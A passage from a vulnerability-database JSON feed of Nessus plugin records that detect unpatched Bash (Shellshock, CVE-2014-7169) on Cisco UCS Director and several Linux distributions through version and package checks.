value:\"34860\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco UCS Director Code Injection (CSCur02877) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running a vulnerable version of Bash.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote host is running a\nversion of Cisco UCS Director that could be affected by 
a command\ninjection vulnerability in GNU Bash known as Shellshock, which is due\nto the processing of trailing strings after function definitions in\nthe values of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\n\nAuthentication on the system is required before this vulnerability can\nbe exploited.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCur02877\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch or upgrade to the version recommended in Cisco bug ID\nCSCur02877\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n 
script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:ucs_director\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucs_director_detect.nbin\");\n script_require_keys(\"Host/Cisco/UCSDirector/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nchckver = get_kb_item_or_exit(\"Host/Cisco/UCSDirector/version\");\n# Could be unknown version because the WebUI can be detected but\n# no version information could be retrieved.\nif (chckver == UNKNOWN_VER) audit(AUDIT_UNKNOWN_DEVICE_VER, \"Cisco UCS Director\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (\n (\n ver_compare(ver:chckver, fix:\"4.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"4.1.0.5\", strict:FALSE) <= 0\n ) ||\n (\n ver_compare(ver:chckver, fix:\"5.0.0.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:chckver, fix:\"5.0.0.2\", strict:FALSE) < 0\n )\n)\n{\n if (report_verbosity > 0)\n {\n if (chckver =~ \"^5\\.\")\n fix = '5.0.0.0 with hotfix cucsd_5_0_0_0_bash_hotfix / 5.0.0.2 / 5.1.0.0';\n else\n fix = '4.1.0.5 with hotfix cucsd_4_1_0_5_bash_hotfix';\n\n report =\n '\\n Installed version : ' + chckver +\n '\\n Fixed version (s) : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 
14.0, 14.1, and -current to fix a security issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-268-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77877);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"SSA\", value:\"2014-268-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.nessus.org/u?663404aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 
audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": 
"NONE"}}, {"lastseen": "2023-05-18T14:23:37", "description": "New bash packages are available for Slackware 13.0 to fix a security issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux:13.0"], "id": "SLACKWARE_SSA_2014-268-02.NASL", "href": "https://www.tenable.com/plugins/nessus/77878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77878);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"SSA\", value:\"2014-268-02\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0 to fix a security\nissue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45f8fb5f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"3_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", 
pkgnum:\"3_slack13.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:25", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 2.2 : bash (OVMSA-2014-0024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:2.2"], "id": "ORACLEVM_OVMSA-2014-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/78239", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0024.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78239);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 2.2 : bash (OVMSA-2014-0024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer 
Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000224.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f04c161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : bash (ELSA-2014-3076)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-3076.NASL", "href": "https://www.tenable.com/plugins/nessus/77892", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3076.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77892);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n 
script_name(english:\"Oracle Linux 7 : bash (ELSA-2014-3076)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004479.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2.0.1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "Tavis Ormandy discovered that the 
security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:bash"], "id": "UBUNTU_USN-2363-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77897);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
